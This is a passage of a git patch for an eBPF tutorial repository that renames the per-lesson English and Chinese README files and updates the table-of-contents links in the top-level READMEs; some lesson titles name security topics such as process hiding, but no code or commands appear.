From 049b40d222f1c61065ab5cf3974c2ef1947199ab Mon Sep 17 00:00:00 2001 From: Yusheng Zheng Date: Sun, 20 Oct 2024 04:26:42 +0000 Subject: [PATCH] rename README to chinese documents --- README.md | 86 ++- README.zh.md | 113 ++- src/0-introduce/README.md | 325 +++++---- src/0-introduce/README.zh.md | 163 +++++ src/0-introduce/README_en.md | 162 ----- src/1-helloworld/README.md | 150 ++-- src/1-helloworld/README.zh.md | 197 ++++++ src/1-helloworld/README_en.md | 195 ------ src/10-hardirqs/README.md | 92 +-- src/10-hardirqs/README.zh.md | 262 +++++++ src/10-hardirqs/README_en.md | 262 ------- src/11-bootstrap/README.md | 161 ++--- .../{README_en.md => README.zh.md} | 161 +++-- src/12-profile/README.md | 161 +++-- src/12-profile/README.zh.md | 335 +++++++++ src/12-profile/README_en.md | 334 --------- src/13-tcpconnlat/README.md | 190 +++-- src/13-tcpconnlat/README.zh.md | 599 ++++++++++++++++ src/13-tcpconnlat/README_en.md | 571 --------------- src/14-tcpstates/README.md | 153 ++-- src/14-tcpstates/README.zh.md | 405 +++++++++++ src/14-tcpstates/README_en.md | 408 ----------- src/15-javagc/README.md | 106 ++- src/15-javagc/README.zh.md | 327 +++++++++ src/15-javagc/README_en.md | 319 --------- src/16-memleak/README.md | 242 +++---- src/16-memleak/README.zh.md | 489 +++++++++++++ src/16-memleak/README_en.md | 447 ------------ src/17-biopattern/README.md | 147 ++-- src/17-biopattern/README.zh.md | 329 +++++++++ src/17-biopattern/README_en.md | 332 --------- src/18-further-reading/README.md | 107 ++- src/18-further-reading/README.zh.md | 149 ++++ src/18-further-reading/README_en.md | 140 ---- src/19-lsm-connect/README.md | 89 +-- src/19-lsm-connect/README.zh.md | 169 +++++ src/19-lsm-connect/README_en.md | 170 ----- src/2-kprobe-unlink/README.md | 69 +- src/2-kprobe-unlink/README.zh.md | 149 ++++ src/2-kprobe-unlink/README_en.md | 150 ---- src/20-tc/README.md | 44 +- src/20-tc/README.zh.md | 108 +++ src/20-tc/README_en.md | 110 --- src/21-xdp/README.md | 116 ++-- src/21-xdp/README.zh.md | 157 +++++ src/21-xdp/README_en.md | 163 ----- src/22-android/README.md | 104 ++- src/22-android/README.zh.md | 154 +++++ src/22-android/README_en.md | 150 ---- src/23-http/README.md | 391 +++++------ src/23-http/README.zh.md | 652 ++++++++++++++++++ src/23-http/README_en.md | 639 ----------------- src/24-hide/README.md | 126 ++-- src/24-hide/README.zh.md | 439 ++++++++++++ src/24-hide/README_en.md | 429 ------------ src/25-signal/README.md | 121 ++-- src/25-signal/README.zh.md | 193 ++++++ src/25-signal/README_en.md | 200 ------ src/26-sudo/README.md | 18 +- src/26-sudo/README.zh.md | 25 + src/26-sudo/README_en.md | 23 - src/27-replace/README.md | 26 +- src/27-replace/README.zh.md | 40 ++ src/27-replace/README_en.md | 38 - src/28-detach/README.md | 81 ++- src/28-detach/README.zh.md | 117 ++++ src/28-detach/README_en.md | 130 ---- src/29-sockops/README.md | 112 +-- src/29-sockops/README.zh.md | 257 +++++++ src/29-sockops/README_en.md | 259 ------- src/3-fentry-unlink/README.md | 42 +- src/3-fentry-unlink/README.zh.md | 89 +++ src/3-fentry-unlink/README_en.md | 87 --- src/30-sslsniff/README.md | 270 ++++---- src/30-sslsniff/README.zh.md | 534 ++++++++++++++ src/30-sslsniff/README_en.md | 544 --------------- src/31-goroutine/README.md | 66 +- src/31-goroutine/README.zh.md | 112 +++ src/31-goroutine/README_en.md | 112 --- src/32-http2/{README.md => README.zh.md} | 0 src/33-funclatency/README.md | 76 +- src/33-funclatency/README.zh.md | 189 +++++ src/33-funclatency/README_en.md | 189 ----- src/34-syscall/README.md | 68 +- src/34-syscall/README.zh.md | 201 ++++++ src/34-syscall/README_en.md | 199 ------ src/35-user-ringbuf/README.md | 74 +- src/35-user-ringbuf/README.zh.md | 223 ++++++ src/35-user-ringbuf/README_en.md | 223 ------ src/36-userspace-ebpf/README.md | 183 +++-- src/36-userspace-ebpf/README.zh.md | 219 ++++++ src/36-userspace-ebpf/README_en.md | 218 ------ src/37-uprobe-rust/README.md | 52 +- src/37-uprobe-rust/README.zh.md | 148 ++++ src/37-uprobe-rust/README_en.md | 148 ---- src/38-btf-uprobe/README.md | 159 +++-- src/38-btf-uprobe/README.zh.md | 298 ++++++++ src/38-btf-uprobe/README_en.md | 313 --------- src/39-nginx/README.md | 110 ++- src/39-nginx/README.zh.md | 149 ++++ src/39-nginx/README_en.md | 145 ---- src/4-opensnoop/README.md | 79 ++- src/4-opensnoop/README.zh.md | 123 ++++ src/4-opensnoop/README_en.md | 122 ---- src/40-mysql/README.md | 82 +-- src/40-mysql/README.zh.md | 105 +++ src/40-mysql/README_en.md | 105 --- src/41-xdp-tcpdump/README.md | 255 ++++--- src/41-xdp-tcpdump/README.zh.md | 509 ++++++++++++++ src/41-xdp-tcpdump/README_en.md | 508 -------------- src/42-xdp-loadbalancer/README.md | 199 +++--- src/42-xdp-loadbalancer/README.zh.md | 527 ++++++++++++++ src/42-xdp-loadbalancer/README_en.md | 528 -------------- src/43-kfuncs/README.md | 322 ++++----- src/43-kfuncs/README.zh.md | 445 ++++++++++++ src/43-kfuncs/README_en.md | 445 ------------ .../module/{README.md => README.zh.md} | 0 src/44-scx-simple/README.md | 425 ++++++++++++ src/44-scx-simple/README.zh.md | 0 src/44-scx-simple/README_en.md | 425 ------------ src/5-uprobe-bashreadline/README.md | 82 +-- src/5-uprobe-bashreadline/README.zh.md | 138 ++++ src/5-uprobe-bashreadline/README_en.md | 124 ---- src/6-sigsnoop/README.md | 34 +- src/6-sigsnoop/README.zh.md | 142 ++++ src/6-sigsnoop/README_en.md | 140 ---- src/7-execsnoop/README.md | 40 +- src/7-execsnoop/README.zh.md | 125 ++++ src/7-execsnoop/README_en.md | 125 ---- src/8-exitsnoop/README.md | 72 +- src/8-exitsnoop/README.zh.md | 162 +++++ src/8-exitsnoop/README_en.md | 162 ----- src/9-runqlat/README.md | 227 +++--- src/9-runqlat/README.zh.md | 449 ++++++++++++ src/9-runqlat/README_en.md | 442 ------------ src/SUMMARY.md | 120 ++-- src/SUMMARY.zh.md | 82 +++ src/SUMMARY_en.md | 89 --- src/bpftrace-tutorial/README.md | 152 ++-- src/bpftrace-tutorial/README.zh.md | 324 +++++++++ src/bpftrace-tutorial/README_en.md | 328 --------- src/scripts/generate_toc.py | 8 +- src/scripts/rename.py | 31 +- 143 files changed, 14546 insertions(+), 14533 deletions(-) create mode 100644 src/0-introduce/README.zh.md delete mode 100644 src/0-introduce/README_en.md create mode 100644 src/1-helloworld/README.zh.md delete mode 100644 src/1-helloworld/README_en.md create mode 100644 src/10-hardirqs/README.zh.md delete mode 100644 src/10-hardirqs/README_en.md rename src/11-bootstrap/{README_en.md => README.zh.md} (53%) create mode 100644 src/12-profile/README.zh.md delete mode 100644 src/12-profile/README_en.md create mode 100644 src/13-tcpconnlat/README.zh.md delete mode 100644 src/13-tcpconnlat/README_en.md create mode 100644 src/14-tcpstates/README.zh.md delete mode 100644 src/14-tcpstates/README_en.md create mode 100644 src/15-javagc/README.zh.md delete mode 100644 src/15-javagc/README_en.md create mode 100644 src/16-memleak/README.zh.md delete mode 100644 src/16-memleak/README_en.md create mode 100644 src/17-biopattern/README.zh.md delete mode 100644 src/17-biopattern/README_en.md create mode 100644 src/18-further-reading/README.zh.md delete mode 100644 src/18-further-reading/README_en.md create mode 100644 src/19-lsm-connect/README.zh.md delete mode 100644 src/19-lsm-connect/README_en.md create mode 100644 src/2-kprobe-unlink/README.zh.md delete mode 100644 src/2-kprobe-unlink/README_en.md create mode 100644 src/20-tc/README.zh.md delete mode 100644 src/20-tc/README_en.md create mode 100644 src/21-xdp/README.zh.md delete mode 100644 src/21-xdp/README_en.md create mode 100644 src/22-android/README.zh.md delete mode 100644 src/22-android/README_en.md create mode 100644 src/23-http/README.zh.md delete mode 100644 src/23-http/README_en.md create mode 100644 src/24-hide/README.zh.md delete mode 100644 src/24-hide/README_en.md create mode 100644 src/25-signal/README.zh.md delete mode 100644 src/25-signal/README_en.md create mode 100644 src/26-sudo/README.zh.md delete mode 100644 src/26-sudo/README_en.md create mode 100644 src/27-replace/README.zh.md delete mode 100644 src/27-replace/README_en.md create mode 100644 src/28-detach/README.zh.md delete mode 100644 src/28-detach/README_en.md create mode 100644 src/29-sockops/README.zh.md delete mode 100644 src/29-sockops/README_en.md create mode 100644 src/3-fentry-unlink/README.zh.md delete mode 100644 src/3-fentry-unlink/README_en.md create mode 100644 src/30-sslsniff/README.zh.md delete mode 100644 src/30-sslsniff/README_en.md create mode 100644 src/31-goroutine/README.zh.md delete mode 100644 src/31-goroutine/README_en.md rename src/32-http2/{README.md => README.zh.md} (100%) create mode 100644 src/33-funclatency/README.zh.md delete mode 100644 src/33-funclatency/README_en.md create mode 100644 src/34-syscall/README.zh.md delete mode 100644 src/34-syscall/README_en.md create mode 100644 src/35-user-ringbuf/README.zh.md delete mode 100644 src/35-user-ringbuf/README_en.md create mode 100644 src/36-userspace-ebpf/README.zh.md delete mode 100644 src/36-userspace-ebpf/README_en.md create mode 100644 src/37-uprobe-rust/README.zh.md delete mode 100644 src/37-uprobe-rust/README_en.md create mode 100644 src/38-btf-uprobe/README.zh.md delete mode 100644 src/38-btf-uprobe/README_en.md create mode 100644 src/39-nginx/README.zh.md delete mode 100644 src/39-nginx/README_en.md create mode 100644 src/4-opensnoop/README.zh.md delete mode 100644 src/4-opensnoop/README_en.md create mode 100644 src/40-mysql/README.zh.md delete mode 100644 src/40-mysql/README_en.md create mode 100644 src/41-xdp-tcpdump/README.zh.md delete mode 100644 src/41-xdp-tcpdump/README_en.md create mode 100644 src/42-xdp-loadbalancer/README.zh.md delete mode 100644 src/42-xdp-loadbalancer/README_en.md create mode 100644 src/43-kfuncs/README.zh.md delete mode 100644 src/43-kfuncs/README_en.md rename src/43-kfuncs/module/{README.md => README.zh.md} (100%) create mode 100644 src/44-scx-simple/README.zh.md delete mode 100644 src/44-scx-simple/README_en.md create mode 100644 src/5-uprobe-bashreadline/README.zh.md delete mode 100644 src/5-uprobe-bashreadline/README_en.md create mode 100755 src/6-sigsnoop/README.zh.md delete mode 100755 src/6-sigsnoop/README_en.md create mode 100644 src/7-execsnoop/README.zh.md delete mode 100644 src/7-execsnoop/README_en.md create mode 100644 src/8-exitsnoop/README.zh.md delete mode 100644 src/8-exitsnoop/README_en.md create mode 100755 src/9-runqlat/README.zh.md delete mode 100755 src/9-runqlat/README_en.md create mode 100644 src/SUMMARY.zh.md delete mode 100644 src/SUMMARY_en.md create mode 100644 src/bpftrace-tutorial/README.zh.md delete mode 100644 src/bpftrace-tutorial/README_en.md diff --git a/README.md b/README.md index 1e02e1e..6ba2398 100644 --- a/README.md +++ b/README.md @@ -13,7 +13,7 @@ This tutorial **does not cover complex concepts and scenario introductions**. It The tutorial focuses on eBPF examples in observability, networking, security, and more. -#### [**中文版在这里**](README.zh.md) +[**中文版在这里**](README.zh.md) ## Table of Contents @@ -21,72 +21,68 @@ The tutorial focuses on eBPF examples in observability, networking, security, an This section contains simple eBPF program examples and introductions. It primarily utilizes the `eunomia-bpf` framework to simplify development and introduces the basic usage and development process of eBPF. -- [lesson 0-introduce](src/0-introduce/README_en.md) Introduction to Core Concepts and Tools -- [lesson 1-helloworld](src/1-helloworld/README_en.md) Hello World, Framework and Development -- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README_en.md) Monitoring unlink System Calls with kprobe -- [lesson 3-fentry-unlink](src/3-fentry-unlink/README_en.md) Monitoring unlink System Calls with fentry -- [lesson 4-opensnoop](src/4-opensnoop/README_en.md) Capturing Opening Files and Filter with Global Variables -- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README_en.md) Capturing readline Function Calls with Uprobe -- [lesson 6-sigsnoop](src/6-sigsnoop/README_en.md) Capturing Signal Sending and Store State with Hash Maps -- [lesson 7-execsnoop](src/7-execsnoop/README_en.md) Capturing Process Execution, Output with perf event array -- [lesson 8-exitsnoop](src/8-exitsnoop/README_en.md) Monitoring Process Exit Events, Output with Ring Buffer -- [lesson 9-runqlat](src/9-runqlat/README_en.md) Capturing Scheduling Latency and Recording as Histogram -- [lesson 10-hardirqs](src/10-hardirqs/README_en.md) Capturing Interrupts with hardirqs or softirqs +- [lesson 0-introduce](src/0-introduce/README.md) Introduction to Core Concepts and Tools +- [lesson 1-helloworld](src/1-helloworld/README.md) Hello World, Framework and Development +- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README.md) Monitoring unlink System Calls with kprobe +- [lesson 3-fentry-unlink](src/3-fentry-unlink/README.md) Monitoring unlink System Calls with fentry +- [lesson 4-opensnoop](src/4-opensnoop/README.md) Capturing Opening Files and Filter with Global Variables +- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README.md) Capturing readline Function Calls with Uprobe +- [lesson 6-sigsnoop](src/6-sigsnoop/README.md) Capturing Signal Sending and Store State with Hash Maps +- [lesson 7-execsnoop](src/7-execsnoop/README.md) Capturing Process Execution, Output with perf event array +- [lesson 8-exitsnoop](src/8-exitsnoop/README.md) Monitoring Process Exit Events, Output with Ring Buffer +- [lesson 9-runqlat](src/9-runqlat/README.md) Capturing Scheduling Latency and Recording as Histogram +- [lesson 10-hardirqs](src/10-hardirqs/README.md) Capturing Interrupts with hardirqs or softirqs + ### Advanced Documents and Examples We start to build complete eBPF projects mainly based on `libbpf` and combine them with various application scenarios for practical use. -- [lesson 11-bootstrap](src/11-bootstrap/README_en.md) Develop User-Space Programs with libbpf and Trace exec() and exit() -- [lesson 12-profile](src/12-profile/README_en.md) Using eBPF Program Profile for Performance Analysis -- [lesson 13-tcpconnlat](src/13-tcpconnlat/README_en.md) Statistics of TCP Connection Delay with libbpf -- [lesson 14-tcpstates](src/14-tcpstates/README_en.md) Recording TCP Connection Status and TCP RTT -- [lesson 15-javagc](src/15-javagc/README_en.md) Capturing User-Space Java GC Duration Using USDT -- [lesson 16-memleak](src/16-memleak/README_en.md) Monitoring Memory Leaks -- [lesson 17-biopattern](src/17-biopattern/README_en.md) Count Random/Sequential Disk I/O -- [lesson 18-further-reading](src/18-further-reading/README_en.md) More Reference Materials: papers, projects -- [lesson 19-lsm-connect](src/19-lsm-connect/README_en.md) Security Detection and Defense using LSM -- [lesson 20-tc](src/20-tc/README_en.md) tc Traffic Control -- [lesson 21-xdp](src/21-xdp/README_en.md) Programmable Packet Processing with XDP +- [lesson 11-bootstrap](src/11-bootstrap/README.md) Develop User-Space Programs with libbpf and Trace exec() and exit() +- [lesson 12-profile](src/12-profile/README.md) Using eBPF Program Profile for Performance Analysis +- [lesson 13-tcpconnlat](src/13-tcpconnlat/README.md) Statistics of TCP Connection Delay with libbpf +- [lesson 14-tcpstates](src/14-tcpstates/README.md) Recording TCP Connection Status and TCP RTT +- [lesson 15-javagc](src/15-javagc/README.md) Capturing User-Space Java GC Duration Using USDT +- [lesson 16-memleak](src/16-memleak/README.md) Monitoring Memory Leaks +- [lesson 17-biopattern](src/17-biopattern/README.md) Count Random/Sequential Disk I/O +- [lesson 18-further-reading](src/18-further-reading/README.md) More Reference Materials: papers, projects +- [lesson 19-lsm-connect](src/19-lsm-connect/README.md) Security Detection and Defense using LSM +- [lesson 20-tc](src/20-tc/README.md) tc Traffic Control +- [lesson 21-xdp](src/21-xdp/README.md) Programmable Packet Processing with XDP + ### In-Depth Topics This section covers advanced topics related to eBPF, including using eBPF programs on Android, possible attacks and defenses using eBPF programs, and complex tracing. Combining the user-mode and kernel-mode aspects of eBPF can bring great power (as well as security risks). - - Android: -- [lesson 22-android](src/22-android/README_en.md) Using eBPF Programs on Android - +- [lesson 22-android](src/22-android/README.md) Using eBPF Programs on Android Networking: -- [lesson 23-http](src/23-http/README_en.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints -- [lesson 29-sockops](src/29-sockops/README_en.md) Accelerating Network Request Forwarding with Sockops -- [lesson 41-xdp-tcpdump](src/41-xdp-tcpdump/README_en.md) Capturing TCP Information with XDP -- [lesson 42-xdp-loadbalancer](src/42-xdp-loadbalancer/README_en.md) XDP Load Balancer - +- [lesson 23-http](src/23-http/README.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints +- [lesson 29-sockops](src/29-sockops/README.md) Accelerating Network Request Forwarding with Sockops +- [lesson 41-xdp-tcpdump](src/41-xdp-tcpdump/README.md) Capturing TCP Information with XDP +- [lesson 42-xdp-loadbalancer](src/42-xdp-loadbalancer/README.md) XDP Load Balancer Security: -- [lesson 24-hide](src/24-hide/README_en.md) Hiding Process or File Information -- [lesson 25-signal](src/25-signal/README_en.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF -- [lesson 26-sudo](src/26-sudo/README_en.md) Using eBPF to add sudo user -- [lesson 27-replace](src/27-replace/README_en.md) Replace Text Read or Written by Any Program with eBPF -- [lesson 28-detach](src/28-detach/README_en.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs -- [lesson 34-syscall](src/34-syscall/README_en.md) Modifying System Call Arguments with eBPF - +- [lesson 24-hide](src/24-hide/README.md) Hiding Process or File Information +- [lesson 25-signal](src/25-signal/README.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF +- [lesson 26-sudo](src/26-sudo/README.md) Using eBPF to add sudo user +- [lesson 27-replace](src/27-replace/README.md) Replace Text Read or Written by Any Program with eBPF +- [lesson 28-detach](src/28-detach/README.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs +- [lesson 34-syscall](src/34-syscall/README.md) Modifying System Call Arguments with eBPF Scheduler: -- [lesson 44-scx-simple](src/44-scx-simple/README_en.md) Introduction to the BPF Scheduler - +- [lesson 44-scx-simple](src/44-scx-simple/README.md) Introduction to the BPF Scheduler Other: -- [lesson 35-user-ringbuf](src/35-user-ringbuf/README_en.md) Asynchronously Send to Kernel with User Ring Buffer -- [lesson 36-userspace-ebpf](src/36-userspace-ebpf/README_en.md) Userspace eBPF Runtimes: Overview and Applications -- [lesson 38-btf-uprobe](src/38-btf-uprobe/README_en.md) Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility -- [lesson 43-kfuncs](src/43-kfuncs/README_en.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules +- [lesson 35-user-ringbuf](src/35-user-ringbuf/README.md) Asynchronously Send to Kernel with User Ring Buffer +- [lesson 36-userspace-ebpf](src/36-userspace-ebpf/README.md) Userspace eBPF Runtimes: Overview and Applications +- [lesson 38-btf-uprobe](src/38-btf-uprobe/README.md) Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility +- [lesson 43-kfuncs](src/43-kfuncs/README.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules Continuously updating... diff --git a/README.zh.md b/README.zh.md index 6cd62e7..c9ad69f 100644 --- a/README.zh.md +++ b/README.zh.md @@ -6,14 +6,6 @@ [Gitee 镜像](https://gitee.com/yunwei37/bpf-developer-tutorial) [English Version](README_en.md) -Dive straight into eBPF development with this concise tutorial, built around the powerful CO-RE (Compile Once, Run Everywhere) philosophy. Whether you're a newbie or a pro, we've got you covered with: - -- 🛠 **Practical Examples:** Start coding with bite-sized examples, some as short as just 20 lines! -- 🔍 **Focused Learning:** We prioritize hands-on learning, skipping the lengthy theory. Each directory offers an independent eBPF tool example. -- 💼 **Modern Frameworks:** Get comfortable with the latest eBPF frameworks such as libbpf, Cilium, libbpf-rs, and eunomia-bpf. -- 🌐 **Multi-language Support:** Play with code samples in C, Go, and Rust. -- 🌍 **Bilingual Content:** This tutorial is available in both Chinese and English. For the English version, check the README_en.md inside each directory. - #### [**Check out the English version here**](README.md) 这是一个基于 `CO-RE`(一次编译,到处运行)的 eBPF 的开发教程,提供了从入门到进阶的 eBPF 开发实践,包括基本概念、代码实例、实际应用等内容。和 BCC 不同的是,我们使用 libbpf、Cilium、libbpf-rs、eunomia-bpf 等框架进行开发,包含 C、Go、Rust 等语言的示例。 @@ -24,67 +16,68 @@ Dive straight into eBPF development with this concise tutorial, built around the ## 目录 -### 入门文档 +### 入门示例 -包含简单的 eBPF 程序样例与介绍,这部分主要使用 `eunomia-bpf` 框架简化开发,并介绍了 eBPF 的基本使用方式和开发流程。 +这一部分包含简单的 eBPF 程序示例和介绍。主要利用 `eunomia-bpf` 框架简化开发,介绍 eBPF 的基本用法和开发流程。 -- [lesson 0-introduce](src/0-introduce/README.md) 介绍 eBPF 的基本概念和常见的开发工具 -- [lesson 1-helloworld](src/1-helloworld/README.md) 使用 eBPF 开发最简单的「Hello World」程序,介绍 eBPF 的基本框架和开发流程 -- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README.md) 在 eBPF 中使用 kprobe 捕获 unlink 系统调用 -- [lesson 3-fentry-unlink](src/3-fentry-unlink/README.md) 在 eBPF 中使用 fentry 捕获 unlink 系统调用 -- [lesson 4-opensnoop](src/4-opensnoop/README.md) 使用 eBPF 捕获进程打开文件的系统调用集合,使用全局变量在 eBPF 中过滤进程 pid -- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README.md) 在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 -- [lesson 6-sigsnoop](src/6-sigsnoop/README.md) 捕获进程发送信号的系统调用集合,使用 hash map 保存状态 -- [lesson 7-execsnoop](src/7-execsnoop/README.md) 捕获进程执行时间,通过 perf event array 向用户态打印输出 -- [lesson 8-execsnoop](src/8-exitsnoop/README.md) 捕获进程退出事件,使用 ring buffer 向用户态打印输出 -- [lesson 9-runqlat](src/9-runqlat/README.md) 捕获进程调度延迟,以直方图方式记录 -- [lesson 10-hardirqs](src/10-hardirqs/README.md) 使用 hardirqs 或 softirqs 捕获中断事件 +- [lesson 0-introduce](src/0-introduce/README.zh.md) eBPF 示例教程 0:核心概念与工具简介 +- [lesson 1-helloworld](src/1-helloworld/README.zh.md) eBPF 入门开发实践教程一:Hello World,基本框架和开发流程 +- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README.zh.md) eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用 +- [lesson 3-fentry-unlink](src/3-fentry-unlink/README.zh.md) eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用 +- [lesson 4-opensnoop](src/4-opensnoop/README.zh.md) eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid +- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README.zh.md) eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 +- [lesson 6-sigsnoop](src/6-sigsnoop/README.zh.md) eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态 +- [lesson 7-execsnoop](src/7-execsnoop/README.zh.md) eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出 +- [lesson 8-exitsnoop](src/8-exitsnoop/README.zh.md) eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出 +- [lesson 9-runqlat](src/9-runqlat/README.zh.md) eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录 +- [lesson 10-hardirqs](src/10-hardirqs/README.zh.md) eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件 -### 进阶文档和示例 +### 高级文档和示例 -我们开始主要基于 `libbpf` 构建完整的 eBPF 工程,并且把它和各种应用场景结合起来进行实践。 +我们开始构建完整的 eBPF 项目,主要基于 `libbpf`,并将其与各种应用场景结合起来,以便实际使用。 -- [lesson 11-bootstrap](src/11-bootstrap/README.md) 使用 libbpf-boostrap 为 eBPF 编写原生的 libbpf 用户态代码,并建立完整的 libbpf 工程。 -- [lesson 12-profile](src/12-profile/README.md) 使用 eBPF 进行性能分析 -- [lesson 13-tcpconnlat](src/13-tcpconnlat/README.md) 记录 TCP 连接延迟,并使用 libbpf 在用户态处理数据 -- [lesson 14-tcpstates](src/14-tcpstates/README.md) 记录 TCP 连接状态与 TCP RTT -- [lesson 15-javagc](src/15-javagc/README.md) 使用 usdt 捕获用户态 Java GC 事件耗时 -- [lesson 16-memleak](src/16-memleak/README.md) 检测内存泄漏 -- [lesson 17-biopattern](src/17-biopattern/README.md) 捕获磁盘 IO 模式 -- [lesson 18-further-reading](src/18-further-reading/README.md) 更进一步的相关资料:论文列表、项目、博客等等 -- [lesson 19-lsm-connect](src/19-lsm-connect/README.md) 使用 LSM 进行安全检测防御 -- [lesson 20-tc](src/20-tc/README.md) 使用 eBPF 进行 tc 流量控制 -- [lesson 21-xdp](src/21-xdp/README.md) 使用 eBPF 进行 XDP 报文处理 +- [lesson 11-bootstrap](src/11-bootstrap/README.zh.md) eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用 +- [lesson 12-profile](src/12-profile/README.zh.md) eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析 +- [lesson 13-tcpconnlat](src/13-tcpconnlat/README.zh.md) eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据 +- [lesson 14-tcpstates](src/14-tcpstates/README.zh.md) eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT +- [lesson 15-javagc](src/15-javagc/README.zh.md) eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时 +- [lesson 16-memleak](src/16-memleak/README.zh.md) eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏 +- [lesson 17-biopattern](src/17-biopattern/README.zh.md) eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O +- [lesson 18-further-reading](src/18-further-reading/README.zh.md) 更多的参考资料:论文、项目等等 +- [lesson 19-lsm-connect](src/19-lsm-connect/README.zh.md) eBPF 入门实践教程:使用 LSM 进行安全检测防御 +- [lesson 20-tc](src/20-tc/README.zh.md) eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制 +- [lesson 21-xdp](src/21-xdp/README.zh.md) eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理 -### 高级主题 +### 深入主题 -这里涵盖了一系列和 eBPF 相关的高级内容,包含在 Android 上使用 eBPF 程序、使用 eBPF 程序进行可能的攻击与防御、复杂的追踪等等。将 eBPF 用户态与内核态的部分结合起来,可能能带来巨大的威力(同时也是安全隐患)。这部分较为复杂的示例会基于 libbpf、Cilium 等框架进行开发,简单示例使用 eunomia-bpf 完成。 +这一部分涵盖了与 eBPF 相关的高级主题,包括在 Android 上使用 eBPF 程序、利用 eBPF 程序进行的潜在攻击和防御以及复杂的追踪。结合用户模式和内核模式的 eBPF 可以带来强大的能力(也可能带来安全风险)。 Android: -- [在 Android 上使用 eBPF 程序](src/22-android/README.md) +- [lesson 22-android](src/22-android/README.zh.md) 在 Android 上使用 eBPF 程序 +网络: -网络和追踪: +- [lesson 23-http](src/23-http/README.zh.md) 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程 +- [lesson 29-sockops](src/29-sockops/README.zh.md) eBPF 开发实践:使用 sockops 加速网络请求转发 +- [lesson 41-xdp-tcpdump](src/41-xdp-tcpdump/README.zh.md) eBPF 示例教程:使用 XDP 捕获 TCP 信息 +- [lesson 42-xdp-loadbalancer](src/42-xdp-loadbalancer/README.zh.md) eBPF 开发者教程: 简单的 XDP 负载均衡器 +安全: -- [使用 uprobe 捕获多种库的 SSL/TLS 明文数据](src/30-sslsniff/README.md) -- [使用 eBPF socket filter 或 syscall trace 追踪 HTTP 请求和其他七层协议](src/23-http/README.md) -- [使用 sockops 加速网络请求转发](src/29-sockops/README.md) +- [lesson 24-hide](src/24-hide/README.zh.md) eBPF 开发实践:使用 eBPF 隐藏进程或文件信息 +- [lesson 25-signal](src/25-signal/README.zh.md) eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程 +- [lesson 26-sudo](src/26-sudo/README.zh.md) 使用 eBPF 添加 sudo 用户 +- [lesson 27-replace](src/27-replace/README.zh.md) 使用 eBPF 替换任意程序读取或写入的文本 +- [lesson 28-detach](src/28-detach/README.zh.md) 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期 +- [lesson 34-syscall](src/34-syscall/README.zh.md) eBPF 开发实践:使用 eBPF 修改系统调用参数 +调度器: -安全: +- [lesson 44-scx-simple](src/44-scx-simple/README.zh.md) None +其他: -- [使用 eBPF 修改系统调用参数](src/34-syscall/README.md) -- [使用 eBPF 隐藏进程或文件信息](src/24-hide/README.md) -- [使用 bpf_send_signal 发送信号终止进程](src/25-signal/README.md) -- [使用 eBPF 添加 sudo 用户](src/26-sudo/README.md) -- [使用 eBPF 替换任意程序读取或写入的文本](src/27-replace/README.md) -- [BPF 的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序](src/28-detach/README.md) -- [eBPF 运行时的安全性与面临的挑战](src/18-further-reading/ebpf-security.zh.md) - -其他高级特性: - -- [eBPF开发实践:使用 user ring buffer 向内核异步发送信息](src/35-user-ringbuf/README.md) -- [用户空间 eBPF 运行时:深度解析与应用实践](src/36-userspace-ebpf/README.md) -- [借助 eBPF 和 BTF,让用户态也能一次编译、到处运行](src/38-btf-uprobe/README.md) +- [lesson 35-user-ringbuf](src/35-user-ringbuf/README.zh.md) eBPF开发实践:使用 user ring buffer 向内核异步发送信息 +- [lesson 36-userspace-ebpf](src/36-userspace-ebpf/README.zh.md) 用户空间 eBPF 运行时:深度解析与应用实践 +- [lesson 38-btf-uprobe](src/38-btf-uprobe/README.zh.md) 借助 eBPF 和 